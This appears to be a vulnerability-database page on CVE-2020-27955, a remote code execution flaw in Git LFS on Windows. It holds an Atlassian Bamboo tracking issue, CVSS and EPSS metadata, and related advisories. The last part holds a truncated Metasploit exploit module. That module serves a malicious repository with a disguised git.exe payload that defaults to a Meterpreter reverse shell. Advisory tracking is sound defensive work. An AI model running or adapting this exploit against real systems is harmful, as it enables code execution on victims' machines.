Description
A remote code exeecution vulnerability was recently discovered in Git LFS:
https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html
Vulnerable git clients that clone a malicious repository are vulnerable to remote code execution.
Please determine if Bamboo is vulnerable. If it is definitively determined not to be affected, please close this as a false positive. If it is vulnerable, please work on remediating the issue.
Affected Software
Related
{"id": "BAM-21284", "vendorId": null, "type": "atlassian", "bulletinFamily": "software", "title": "Git LFS on Windows vulnerable to remote code execution (CVE-2020-27955)", "description": "A remote code exeecution vulnerability was recently discovered in Git LFS:\r\n\r\nhttps://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html\r\n\r\nVulnerable git clients that clone a malicious repository are vulnerable to remote code execution. \r\n\r\nPlease determine if Bamboo is vulnerable. If it is definitively determined not to be affected, please close this as a false positive. If it is vulnerable, please work on remediating the issue.", "published": "2021-03-26T17:02:11", "modified": "2023-01-05T10:32:23", "epss": [{"cve": "CVE-2020-27955", "epss": 0.91818, "percentile": 0.98431, "modified": "2023-06-06"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://jira.atlassian.com/browse/BAM-21284", "reporter": "security-metrics-bot", "references": [], "cvelist": ["CVE-2020-27955"], "immutableFields": [], "lastseen": "2023-06-06T16:03:17", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2020-27955"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-21267", "ATLASSIAN:BAM-21284", "ATLASSIAN:SRCTREEWIN-13410", "ATLASSIAN:SRCTREEWIN-13480", "BAM-21267", "SRCTREEWIN-13410", "SRCTREEWIN-13480"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1222"]}, {"type": "cve", "idList": ["CVE-2020-27955", "CVE-2021-21237"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-27955", "DEBIANCVE:CVE-2021-21237"]}, {"type": "github", "idList": ["GHSA-4G4P-42WC-9F3M", "GHSA-CX3W-XQMC-84G5"]}, {"type": "githubexploit", "idList": ["12E6F100-A1FF-594C-99C4-DB7C8CE01C78", "161C23A4-C55D-51E1-879C-C0118D1D6700", "30298115-342F-55E1-9EAC-729DC1B3D181", "4B231570-F0E2-58B6-8CC3-9375EA7D545C", "78AAAA4C-FD3D-5AE7-B155-5E7646CA947E", "8C51F794-A253-5F1E-B5D0-0B1213520826", "D56AA8A3-479D-504C-8FD5-DDF516063BD9", "DBF83092-127A-57DA-9F19-F1D868B01365", "FF9E9079-09ED-5DA5-A816-5FEB139C03E5", "FFCE0773-643A-5405-B466-F165D1B6EA7C"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-GIT_LFS_RCE-"]}, {"type": "osv", "idList": ["OSV:GHSA-4G4P-42WC-9F3M", "OSV:GHSA-CX3W-XQMC-84G5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159923", "PACKETSTORM:164180"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:30F8EDB723C29FCCD04238CA5385CB84"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-27955", "UB:CVE-2021-21237"]}, {"type": "veracode", "idList": ["VERACODE:34211"]}, {"type": "zdt", "idList": ["1337DAY-ID-35186", "1337DAY-ID-36763"]}]}, "score": {"value": 1.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:SRCTREEWIN-13410", "ATLASSIAN:SRCTREEWIN-13480"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1222"]}, {"type": "cve", "idList": ["CVE-2020-27955"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-27955"]}, {"type": "github", "idList": ["GHSA-4G4P-42WC-9F3M"]}, {"type": "githubexploit", "idList": ["12E6F100-A1FF-594C-99C4-DB7C8CE01C78", "161C23A4-C55D-51E1-879C-C0118D1D6700", "30298115-342F-55E1-9EAC-729DC1B3D181", "4B231570-F0E2-58B6-8CC3-9375EA7D545C", "78AAAA4C-FD3D-5AE7-B155-5E7646CA947E", "8C51F794-A253-5F1E-B5D0-0B1213520826", "D56AA8A3-479D-504C-8FD5-DDF516063BD9", "DBF83092-127A-57DA-9F19-F1D868B01365", "FFCE0773-643A-5405-B466-F165D1B6EA7C"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/GIT_LFS_RCE/"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159923", "PACKETSTORM:164180"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:30F8EDB723C29FCCD04238CA5385CB84"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-27955"]}, {"type": "zdt", "idList": ["1337DAY-ID-35186", "1337DAY-ID-36763"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "bamboo", "version": 7}, {"name": "bamboo", "version": 7}]}, "epss": [{"cve": "CVE-2020-27955", "epss": 0.92316, "percentile": 0.98442, "modified": "2023-05-03"}], "vulnersScore": 1.3}, "_state": {"dependencies": 1686083422, "score": 1686067401, "affected_software_major_version": 0, "epss": 0}, "_internal": {"score_hash": "862c8afbb8befaef1d8d16d6e6b36970"}, "affectedSoftware": [{"version": "7.2.1", "operator": "le", "name": "bamboo"}, {"version": "7.2.2", "operator": "lt", "name": "bamboo"}]}
{"atlassian": [{"lastseen": "2021-09-16T06:43:41", "description": "A remote code exeecution vulnerability was recently discovered in Git LFS:\r\n\r\nhttps://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html\r\n\r\nVulnerable git clients that clone a malicious repository are vulnerable to remote code execution. \r\n\r\nPlease determine if Bamboo is vulnerable. If it is definitively determined not to be affected, please close this as a false positive. If it is vulnerable, please work on remediating the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T17:02:11", "type": "atlassian", "title": "Git LFS on Windows vulnerable to remote code execution (CVE-2020-27955)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-09-16T05:28:41", "id": "ATLASSIAN:BAM-21284", "href": "https://jira.atlassian.com/browse/BAM-21284", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-16T06:43:48", "description": "Git LFS is vulnerable to remote code execution on Windows (CVE-2021-21237):\r\n\r\nOn Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.\r\n\r\nThis is the result of an incomplete fix for CVE-2020-27955.\r\n\r\nThis issue occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator.\r\n\r\nFix contains only changes to Windows AMIs used by Bamboo Elastic agents", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-10T11:05:09", "type": "atlassian", "title": "Bamboo for Windows uses a version of Git LFS vulnerable to remote code execution (CVE-2021-21237)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-09-16T05:28:41", "id": "ATLASSIAN:BAM-21267", "href": "https://jira.atlassian.com/browse/BAM-21267", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:40:38", "description": "There was an argument injection vulnerability in SourceTree for Windows introduced through git-lfs. An attacker could create a malicious repository which, after being cloned in SourceTree for Windows and enabled with git-lfs, is able to exploit this issue to gain code execution on the system.\u00a0*This is the result of an incomplete fix for CVE-2020-27955*\r\n\r\n*Affected versions:*\r\n * Version\u00a03.4.2 and earlier\r\n\r\n\u00a0\r\n\r\n*Fix*\r\n * You can download the latest version of\u00a0the [standard installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourceTreeSetup-3.3.9.exe] or the [enterprise installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourcetreeEnterpriseSetup_3.3.9.msi].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/display/SOURCETREEKB/SourceTree+for+Windows+Security+Advisory+24th+March+2021]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-26T17:00:21", "type": "atlassian", "title": "RCE via git-lfs in Sourcetree for Windows - CVE-2021-21237", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-03-24T16:51:11", "id": "ATLASSIAN:SRCTREEWIN-13480", "href": "https://jira.atlassian.com/browse/SRCTREEWIN-13480", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:56:34", "description": "There was an argument injection vulnerability in SourceTree for Windows introduced through git-lfs. An attacker could create a malicious repository which, after being cloned in SourceTree for Windows and enabled with git-lfs, is able to exploit this issue to gain code execution on the system.\r\n\r\n*Affected versions:*\r\n * Version\u00a03.3.9\u00a0and earlier\r\n\r\n\u00a0\r\n\r\n*Fix*\r\n * You can download the latest version of\u00a0the [standard installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourceTreeSetup-3.3.9.exe] or the [enterprise installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourcetreeEnterpriseSetup_3.3.9.msi].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/display/SOURCETREEKB/SourceTree+for+Windows+Security+Advisory+24th+March+2021]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-07T17:07:10", "type": "atlassian", "title": "RCE via git-lfs in Sourcetree for Windows - CVE-2020-27955", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-03-24T16:50:54", "id": "SRCTREEWIN-13410", "href": "https://jira.atlassian.com/browse/SRCTREEWIN-13410", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:56:35", "description": "There was an argument injection vulnerability in SourceTree for Windows introduced through git-lfs. An attacker could create a malicious repository which, after being cloned in SourceTree for Windows and enabled with git-lfs, is able to exploit this issue to gain code execution on the system.\u00a0*This is the result of an incomplete fix for CVE-2020-27955*\r\n\r\n*Affected versions:*\r\n * Version\u00a03.4.2 and earlier\r\n\r\n\u00a0\r\n\r\n*Fix*\r\n * You can download the latest version of\u00a0the [standard installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourceTreeSetup-3.3.9.exe] or the [enterprise installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourcetreeEnterpriseSetup_3.3.9.msi].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/display/SOURCETREEKB/SourceTree+for+Windows+Security+Advisory+24th+March+2021]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-26T17:00:21", "type": "atlassian", "title": "RCE via git-lfs in Sourcetree for Windows - CVE-2021-21237", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-03-24T16:51:11", "id": "SRCTREEWIN-13480", "href": "https://jira.atlassian.com/browse/SRCTREEWIN-13480", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T16:03:20", "description": "Git LFS is vulnerable to remote code execution on Windows (CVE-2021-21237):\r\n\r\nOn Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.\r\n\r\nThis is the result of an incomplete fix for CVE-2020-27955.\r\n\r\nThis issue occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator.\r\n\r\nFix contains only changes to Windows AMIs used by Bamboo Elastic agents", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T11:05:09", "type": "atlassian", "title": "Bamboo for Windows uses a version of Git LFS vulnerable to remote code execution (CVE-2021-21237)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2023-01-05T10:32:24", "id": "BAM-21267", "href": "https://jira.atlassian.com/browse/BAM-21267", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:40:50", "description": "There was an argument injection vulnerability in SourceTree for Windows introduced through git-lfs. An attacker could create a malicious repository which, after being cloned in SourceTree for Windows and enabled with git-lfs, is able to exploit this issue to gain code execution on the system.\r\n\r\n*Affected versions:*\r\n * Version\u00a03.3.9\u00a0and earlier\r\n\r\n\u00a0\r\n\r\n*Fix*\r\n * You can download the latest version of\u00a0the [standard installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourceTreeSetup-3.3.9.exe] or the [enterprise installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourcetreeEnterpriseSetup_3.3.9.msi].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/display/SOURCETREEKB/SourceTree+for+Windows+Security+Advisory+24th+March+2021]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-07T17:07:10", "type": "atlassian", "title": "RCE via git-lfs in Sourcetree for Windows - CVE-2020-27955", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-03-24T16:50:54", "id": "ATLASSIAN:SRCTREEWIN-13410", "href": "https://jira.atlassian.com/browse/SRCTREEWIN-13410", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2023-04-18T05:47:08", "description": "github.com/git-lfs/git-lfs is vulnerable to remote code execution. The vulnerability exists in 'ExecCommand' function of `subprocess_windows.go` which allows an attacker to inject and execute codes in the root directory of a malicious repository by simply adding an executable files. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-14T09:57:20", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2022-04-19T18:33:50", "id": "VERACODE:34211", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34211/summary", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-09-16T16:20:32", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "packetstorm", "title": "Git git-lfs Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-09-16T00:00:00", "id": "PACKETSTORM:164180", "href": "https://packetstormsecurity.com/files/164180/Git-git-lfs-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Git \ninclude Msf::Exploit::Git::Lfs \ninclude Msf::Exploit::Git::SmartHttp \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Git Remote Code Execution via git-lfs (CVE-2020-27955)', \n'Description' => %q{ \nA critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for \nversioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked \ninto cloning the attacker\u2019s malicious repository using a vulnerable Git version control tool \n}, \n'Author' => [ \n'Dawid Golunski ', # Discovery \n'space-r7', # Guidance, git mixins \n'jheysel-r7' # Metasploit module \n], \n'References' => [ \n['CVE', '2020-27955'], \n['URL', 'https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/'] \n], \n'DisclosureDate' => '2020-11-04', # Public disclosure \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Git LFS <= 2.12', \n{ \n'Platform' => ['win'] \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'WfsDelay' => 10 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nARTIFACTS_ON_DISK \n] \n} \n) \n) \n \nregister_options([ \nOptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ]) \n]) \nderegister_options('RHOSTS') \nend \n \ndef setup_repo_structure \npayload_fname = 'git.exe' \n@hook_payload = generate_payload_exe \n \nptr_file = generate_pointer_file(@hook_payload) \ngit_payload_ptr = GitObject.build_blob_object(ptr_file) \n \ngit_attr_fname = '.gitattributes' \ngit_attr_content = \"#{payload_fname} filter=lfs diff=lfs merge=lfs\" \ngit_attr_obj = GitObject.build_blob_object(git_attr_content) \n \nregister_dir_for_cleanup('.git') \nregister_files_for_cleanup(git_attr_fname) \n \n# root of repository \ntree_ent = \n[ \n{ \nmode: '100644', \nfile_name: git_attr_fname, \nsha1: git_attr_obj.sha1 \n}, \n{ \nmode: '100755', \nfile_name: payload_fname, \nsha1: git_payload_ptr.sha1 \n} \n] \n \ntree_obj = GitObject.build_tree_object(tree_ent) \ncommit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1) \n \n@git_objs = \n[ \ncommit, tree_obj, git_attr_obj, git_payload_ptr \n] \n \n@refs = \n{ \n'HEAD' => 'refs/heads/master', \n'refs/heads/master' => commit.sha1 \n} \nend \n \n# \n# Determine whether or not the target is exploitable based on the User-Agent header returned from the client. \n# The git version must be equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0 to be \n# exploitable by this vulnerability. \n# \n# Returns +true+ if the target is suitable, else fail_with descriptive message \n# \ndef target_suitable?(user_agent) \ninfo = fingerprint_user_agent(user_agent) \nif info[:ua_name] == Msf::HttpClients::UNKNOWN \nfail_with(Failure::NoTarget, \"The client's User-Agent string was unidentifiable: #{info}. The client needs to clone the malicious repo on windows with a git version less than 2.29.0\") \nend \n \nif info[:os_name] == 'Windows' && \n((info[:ua_name] == Msf::HttpClients::GIT && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.29.2')) || \n(info[:ua_name] == Msf::HttpClients::GIT_LFS && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.12'))) \ntrue \nelse \nfail_with(Failure::NotVulnerable, \"The git client needs to be running on Windows with a version equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0. The user agent, #{info[:ua_name]}, found was running on, #{info[:os_name]} and was at version: #{info[:ua_ver]}\") \nend \nend \n \ndef on_request_uri(cli, req) \ntarget_suitable?(req.headers['User-Agent']) \nif req.uri.include?('git-upload-pack') \nrequest = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req) \ncase request.type \nwhen 'ref-discovery' \nresponse = send_refs(request) \nwhen 'upload-pack' \nresponse = send_requested_objs(request) \nelse \nfail_with(Failure::UnexpectedReply, 'Git client did not send a valid request') \nend \nelse \nresponse = handle_lfs_objects(req, @hook_payload, @git_addr) \nunless response.code == 200 \ncli.send_response(response) \nfail_with(Failure::UnexpectedReply, 'Failed to respond to Git client\\'s LFS request') \nend \nend \ncli.send_response(response) \nend \n \ndef create_git_uri \n\"/#{Faker::App.name.downcase}.git\".gsub(' ', '-') \nend \n \ndef primer \n@git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI'] \n@git_addr = URI.parse(get_uri).merge(@git_repo_uri) \nprint_status(\"Git repository to clone: #{@git_addr}\") \nhardcoded_uripath(@git_repo_uri) \nhardcoded_uripath(\"/#{Digest::SHA256.hexdigest(@hook_payload)}\") \nend \n \ndef handle_lfs_objects(req, hook_payload, git_addr) \ngit_hook_obj = GitObject.build_blob_object(hook_payload) \n \ncase req.method \nwhen 'POST' \nprint_status('Sending payload data...') \nresponse = get_batch_response(req, git_addr, git_hook_obj) \nfail_with(Failure::UnexpectedReply, 'Client request was invalid') unless response \nwhen 'GET' \nprint_status('Sending LFS object...') \nresponse = get_requested_obj_response(req, git_hook_obj) 